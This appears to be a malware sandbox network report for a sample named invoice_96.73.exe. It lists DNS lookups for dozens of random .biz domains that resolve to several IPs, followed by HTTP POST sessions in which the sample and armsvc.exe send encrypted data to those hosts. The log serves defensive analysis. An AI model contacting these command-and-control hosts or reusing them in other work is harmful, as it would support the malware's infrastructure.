                                                                                                                                                                Nov 28, 2024 12:14:18.087620974 CET6500953192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:18.224440098 CET53650098.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:19.539539099 CET6495653192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:19.663516045 CET53649568.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:20.947062969 CET5452153192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:21.081248045 CET53545218.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:23.395471096 CET4975053192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:23.519082069 CET53497508.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:23.751730919 CET6468753192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:23.885927916 CET53646878.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:25.457536936 CET6508453192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:25.592184067 CET53650848.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:26.905095100 CET6337353192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:27.039477110 CET53633738.8.8.8192.168.2.22
                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                Nov 28, 2024 12:11:51.748330116 CET192.168.2.228.8.8.80x96baStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:51.757612944 CET192.168.2.228.8.8.80xcce2Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:53.482934952 CET192.168.2.228.8.8.80xe817Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:53.548240900 CET192.168.2.228.8.8.80x5662Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:55.789603949 CET192.168.2.228.8.8.80xf993Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:57.487776995 CET192.168.2.228.8.8.80xac3dStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:59.186207056 CET192.168.2.228.8.8.80xc66aStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:04.685637951 CET192.168.2.228.8.8.80xa99eStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:04.812988997 CET192.168.2.228.8.8.80x71b4Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:07.205333948 CET192.168.2.228.8.8.80xd14bStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:07.340986967 CET192.168.2.228.8.8.80xfdf5Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:07.465887070 CET192.168.2.228.8.8.80xf42eStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:51.929265976 CET192.168.2.228.8.8.80x9d6dStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:36.258462906 CET192.168.2.228.8.8.80x6670Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:38.649343014 CET192.168.2.228.8.8.80xb22Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:41.439563036 CET192.168.2.228.8.8.80xdc14Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:42.862447023 CET192.168.2.228.8.8.80xfda6Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:45.167891026 CET192.168.2.228.8.8.80xb07fStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:47.992669106 CET192.168.2.228.8.8.80x4232Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:50.120928049 CET192.168.2.228.8.8.80xf095Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:51.567184925 CET192.168.2.228.8.8.80x727dStandard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:54.113997936 CET192.168.2.228.8.8.80xfa1bStandard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:01.800045967 CET192.168.2.228.8.8.80x6b55Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:03.253201962 CET192.168.2.228.8.8.80x7a26Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:04.927429914 CET192.168.2.228.8.8.80x2ae4Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:06.636229038 CET192.168.2.228.8.8.80xed01Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:08.026230097 CET192.168.2.228.8.8.80x23a4Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:10.038036108 CET192.168.2.228.8.8.80x950Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:11.666867018 CET192.168.2.228.8.8.80x25d4Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:12.488692045 CET192.168.2.228.8.8.80xabc7Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:14.218981028 CET192.168.2.228.8.8.80x3928Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:15.844633102 CET192.168.2.228.8.8.80xe7a0Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:18.087620974 CET192.168.2.228.8.8.80xa192Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:19.539539099 CET192.168.2.228.8.8.80x1aa3Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:20.947062969 CET192.168.2.228.8.8.80xb742Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:23.395471096 CET192.168.2.228.8.8.80xa29aStandard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:23.751730919 CET192.168.2.228.8.8.80x7db3Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:25.457536936 CET192.168.2.228.8.8.80xc6c1Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:26.905095100 CET192.168.2.228.8.8.80x633bStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                Nov 28, 2024 12:11:51.880790949 CET8.8.8.8192.168.2.220xcce2No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:51.883121967 CET8.8.8.8192.168.2.220x96baNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:53.606897116 CET8.8.8.8192.168.2.220xe817No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:53.671719074 CET8.8.8.8192.168.2.220x5662No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:55.924416065 CET8.8.8.8192.168.2.220xf993No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:57.611253023 CET8.8.8.8192.168.2.220xac3dNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:59.321238995 CET8.8.8.8192.168.2.220xc66aNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:59.321238995 CET8.8.8.8192.168.2.220xc66aNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:04.810594082 CET8.8.8.8192.168.2.220xa99eName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:04.948873997 CET8.8.8.8192.168.2.220x71b4No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:07.339690924 CET8.8.8.8192.168.2.220xd14bName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 28, 2024 12:12:07.464014053 CET | 8.8.8.8 | 192.168.2.22 | 0xfdf5 | Name error (3) | anpmnmxo.biz | none | none | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:12:07.600780964 CET | 8.8.8.8 | 192.168.2.22 | 0xf42e | No error (0) | lpuegx.biz | | 82.112.184.197 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:12:52.054832935 CET | 8.8.8.8 | 192.168.2.22 | 0x9d6d | No error (0) | vjaxhpbji.biz | | 82.112.184.197 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:13:36.392750025 CET | 8.8.8.8 | 192.168.2.22 | 0x6670 | No error (0) | xlfhhhm.biz | | 47.129.31.212 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:13:38.772140980 CET | 8.8.8.8 | 192.168.2.22 | 0xb22 | No error (0) | ifsaia.biz | | 13.251.16.150 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:13:41.573719025 CET | 8.8.8.8 | 192.168.2.22 | 0xdc14 | No error (0) | saytjshyf.biz | | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:13:42.996898890 CET | 8.8.8.8 | 192.168.2.22 | 0xfda6 | No error (0) | vcddkls.biz | | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:13:45.302222967 CET | 8.8.8.8 | 192.168.2.22 | 0xb07f | No error (0) | fwiwk.biz | | 172.234.222.143 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:13:45.302222967 CET | 8.8.8.8 | 192.168.2.22 | 0xb07f | No error (0) | fwiwk.biz | | 172.234.222.138 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:13:48.115710974 CET | 8.8.8.8 | 192.168.2.22 | 0x4232 | No error (0) | tbjrpv.biz | | 34.246.200.160 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:13:50.243944883 CET | 8.8.8.8 | 192.168.2.22 | 0xf095 | No error (0) | deoci.biz | | 18.208.156.248 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:13:51.702402115 CET | 8.8.8.8 | 192.168.2.22 | 0x727d | No error (0) | gytujflc.biz | | 208.100.26.245 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:13:54.248264074 CET | 8.8.8.8 | 192.168.2.22 | 0xfa1b | No error (0) | qaynky.biz | | 13.251.16.150 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:01.935954094 CET | 8.8.8.8 | 192.168.2.22 | 0x6b55 | No error (0) | bumxkqgxu.biz | | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:03.387825966 CET | 8.8.8.8 | 192.168.2.22 | 0x7a26 | No error (0) | dwrqljrr.biz | | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:05.050311089 CET | 8.8.8.8 | 192.168.2.22 | 0x2ae4 | No error (0) | nqwjmb.biz | | 35.164.78.200 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:06.759259939 CET | 8.8.8.8 | 192.168.2.22 | 0xed01 | No error (0) | ytctnunms.biz | | 3.94.10.34 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:08.149116993 CET | 8.8.8.8 | 192.168.2.22 | 0x23a4 | No error (0) | myups.biz | | 165.160.15.20 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:08.149116993 CET | 8.8.8.8 | 192.168.2.22 | 0x23a4 | No error (0) | myups.biz | | 165.160.13.20 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:10.162388086 CET | 8.8.8.8 | 192.168.2.22 | 0x950 | No error (0) | oshhkdluh.biz | | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:11.801893950 CET | 8.8.8.8 | 192.168.2.22 | 0x25d4 | No error (0) | yunalwv.biz | | 208.100.26.245 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:12.623533964 CET | 8.8.8.8 | 192.168.2.22 | 0xabc7 | No error (0) | jpskm.biz | | 18.246.231.120 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:14.353184938 CET | 8.8.8.8 | 192.168.2.22 | 0x3928 | No error (0) | lrxdmhrr.biz | | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:15.979394913 CET | 8.8.8.8 | 192.168.2.22 | 0xe7a0 | No error (0) | wllvnzb.biz | | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:18.224440098 CET | 8.8.8.8 | 192.168.2.22 | 0xa192 | No error (0) | gnqgo.biz | | 18.208.156.248 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:19.663516045 CET | 8.8.8.8 | 192.168.2.22 | 0x1aa3 | No error (0) | jhvzpcfg.biz | | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:21.081248045 CET | 8.8.8.8 | 192.168.2.22 | 0xb742 | No error (0) | acwjcqqv.biz | | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:23.885927916 CET | 8.8.8.8 | 192.168.2.22 | 0x7db3 | No error (0) | vyome.biz | | 18.246.231.120 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:25.592184067 CET | 8.8.8.8 | 192.168.2.22 | 0xc6c1 | No error (0) | yauexmxk.biz | | 18.208.156.248 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 12:14:27.039477110 CET | 8.8.8.8 | 192.168.2.22 | 0x633b | No error (0) | iuzpxe.biz | | 13.251.16.150 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49163 | 54.244.188.177 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:11:52.049103975 CET | 355 | OUT | POST /qbdegkuges HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 852
Nov 28, 2024 12:11:52.049149990 CET | 852 | OUT | Data Raw: da a2 7e be 31 2f 5e c9 48 03 00 00 86 c5 09 5c 31 8c f8 cd 46 ce 7b 33 f7 da be f2 87 b6 3e 08 4f 29 28 10 b3 f6 7b e1 31 e6 6f 88 05 52 cc ab 42 bd e5 63 59 68 10 53 a9 8e 50 12 3b 13 11 e5 95 04 be 61 5f 17 d6 05 a9 21 06 73 17 3f 0c 36 76 70
Data Ascii: ~1/^H\1F{3>O)({1oRBcYhSP;a_!s?6vpC++]O.XL>e9a0ZEz2"q-OC1a:*j"1[;&Y+_\|iML4'-Ss{kYYn<?Gr8M#;K5MpL2C#k6`KqS
Nov 28, 2024 12:11:53.445842981 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 11:11:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=421e9b27de3d6b9b689ef6b771a998f7|8.46.123.228|1732792313|1732792313|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49164 | 54.244.188.177 | 80 | 3268 | C:\Users\user\Desktop\invoice_96.73.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:11:52.053747892 CET | 355 | OUT | POST /qbdegkuges HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 808
Nov 28, 2024 12:11:52.053747892 CET | 808 | OUT | Data Raw: 43 2f 84 a8 84 07 6c e0 1c 03 00 00 72 8e 7f 2f 57 34 72 05 d9 a8 b5 1c 8a fa 8c 29 4d 66 67 d2 72 fe e4 80 3d 8c 81 52 2a 3c 5a 6a 86 89 58 59 ea 23 3f 99 a2 aa 9f be 4d 8a b6 e7 be 0d c6 d3 0e 9a ad dc 33 51 7b 48 89 89 60 a9 d2 d9 27 47 e8 a7
Data Ascii: C/lr/W4r)Mfgr=R*<ZjXY#?M3Q{H`'GE1!9'e7qC|!mX"ix=lDJk)lY'o)EhfA12K$,/nSHq:Um#JH24II|a'P8w&]
Nov 28, 2024 12:11:53.408859968 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 11:11:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=809b3761f185e27ce04ab0abcdbfede6|8.46.123.228|1732792313|1732792313|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49165 | 18.141.10.107 | 80 | 3268 | C:\Users\user\Desktop\invoice_96.73.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:11:53.728768110 CET | 358 | OUT | POST /bpewylwxymwihal HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 808
Nov 28, 2024 12:11:53.728799105 CET | 808 | OUT | Data Raw: be 8b 45 25 13 8c 84 e5 1c 03 00 00 03 9b 8f 74 5d 8c d0 c9 0d e0 2a 1b 71 2a fb 43 58 5f b2 43 11 12 e5 58 01 c0 b4 33 0a 86 77 e0 01 23 83 ca 10 e2 4c e5 0a ef cb 14 66 b9 8c b9 47 68 7f 71 2a 46 de 2d a9 5c cd 51 4d c8 63 21 c8 1d ce 21 f5 2e
Data Ascii: E%t]*q*CX_CX3w#LfGhq*F-\QMc!!.qG>u%bf'DE<0UCB%(2w$HIna)w h$<gVA):7IlVSs_im$axLF/=A$q*b=>Ob4e


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49166 | 18.141.10.107 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:11:53.793314934 CET | 356 | OUT | POST /xuofommcmtwcs HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 852
Nov 28, 2024 12:11:53.793332100 CET | 852 | OUT | Data Raw: 8c a9 87 f9 6d e4 78 83 48 03 00 00 44 15 00 5d 06 98 90 a0 64 20 21 90 da 33 3d 28 44 0a 60 cc 4f a4 dd 78 4f 61 24 f6 38 34 d9 a2 13 fd 28 c3 68 79 c5 e2 df 57 70 7a 46 ca ce 45 d9 53 36 30 9d 06 a3 2d 4b 3f b6 4f 85 a3 80 c1 f4 9d f3 42 c6 48
Data Ascii: mxHD]d !3=(D`OxOa$84(hyWpzFES60-K?OBHZ<L#vnr<Vy$c/WD,#R'D~%]z!)jlq1YzP8Dvw-=.YrtZ.uMh<m<twrEF`
Nov 28, 2024 12:11:55.782172918 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 11:11:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3219e5bd7b92d3f41966d365cc5970ca|8.46.123.228|1732792315|1732792315|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49167 | 54.244.188.177 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:11:56.047502041 CET | 344 | OUT | POST /dyk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 852
Nov 28, 2024 12:11:56.047527075 CET | 852 | OUT | Data Raw: 32 22 b8 f4 b3 cf 5d 40 48 03 00 00 d6 f1 90 11 5e af 4c d3 b0 71 ab aa 29 80 6b ef bf c5 f7 9e c2 dd 72 38 15 78 6e f2 fc ba 9b 5d 99 59 53 15 a0 7b b1 6e 6d 7f 8f 62 d8 e1 11 ba 19 49 3e 5f 4b 55 a6 59 2a e4 f9 e5 bf 0b 81 17 a2 07 93 2c 49 d1
Data Ascii: 2"]@H^Lq)kr8xn]YS{nmbI>_KUY*,IV1SiImKyg! K' cLMFlZ(NI3PRu#&bu\Q Po1FwlPJ.F!Vp"2\+%d/Du
Nov 28, 2024 12:11:57.410089970 CET | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 11:11:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=78308ab4f9f651eb0c5d103d5419703b|8.46.123.228|1732792317|1732792317|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49168 | 44.221.84.105 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:11:57.867679119 CET | 350 | OUT | POST /xtaadg HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: npukfztj.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:11:57.867697954 CET | 852 | OUT | Data Raw: e5 41 c4 65 37 17 24 e1 48 03 00 00 a7 a2 9f 6a fb a7 ec 66 5e 7a dd 73 fa d4 74 f8 0d 41 90 ac eb 0d 72 19 8e a3 f4 57 5e e6 a7 09 00 bd c9 a8 62 45 15 fd 53 c6 d5 82 83 b7 df 57 70 21 48 40 0b 15 26 5c 36 bd 0c f4 a4 bd 7d 51 1d f6 1f bc 72 7e
    Data Ascii: Ae7$Hjf^zstArW^bESWp!H@&\6}Qr~T2OP>G.*b{fYYE!yr\Ls+~ehUljqg=_Q(.r]iNb#$[&<zrwmg[,il<F)JD?U@:
Nov 28, 2024 12:11:58.960014105 CET | 412 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 28 Nov 2024 11:11:58 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=7871629bca75bcf8f46013795aff480e|8.46.123.228|1732792318|1732792318|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.22 | 49169 | 172.234.222.143 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:11:59.443458080 CET | 348 | OUT | POST /nabdw HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:11:59.443593025 CET | 852 | OUT | Data Raw: 94 64 08 d6 6f 08 c3 f2 48 03 00 00 c9 e4 f0 ed ef 44 0b a9 72 03 d6 26 13 03 f0 e8 c1 0f 7b 95 5e c8 6e 08 30 ac 35 c5 b8 20 3c 7d 77 d2 b1 af 9c ef 61 c2 99 6c af da d3 77 b1 01 6d 18 f2 b0 e9 5c e7 e7 b9 fb 07 6d f9 e0 03 00 8d 48 c4 68 ad 36
    Data Ascii: doHDr&{^n05 <}walwm\mHh6y{4l$"spm{uv^&,~U!yfs\O$}7fWx4q=r(7\Tg\-B_$s''f1I.<RX"k:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.22 | 49170 | 172.234.222.143 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:12:03.497939110 CET | 355 | OUT | POST /vccrolpmtjge HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:12:03.497953892 CET | 852 | OUT | Data Raw: bb 4e c4 82 d6 62 95 2c 48 03 00 00 a5 85 e7 65 e1 61 80 e2 bc 17 8b e0 15 ea 9f bd 04 0a 12 54 0a 98 e1 0d 91 a6 2d fb 37 5a 1e 32 11 a1 12 5c fe 9a 2e 93 d1 f2 9e 49 7e 74 b5 a1 64 1a a3 12 a0 eb df 62 94 c0 85 22 0a b9 24 ef 75 9d 34 81 a4 cb
    Data Ascii: Nb,HeaT-7Z2\.I~tdb"$u4J!d.[Txe.BeHsgb` zzE8hwM#HYxNp~`r*cvA@nng[(@hi)I:GbR


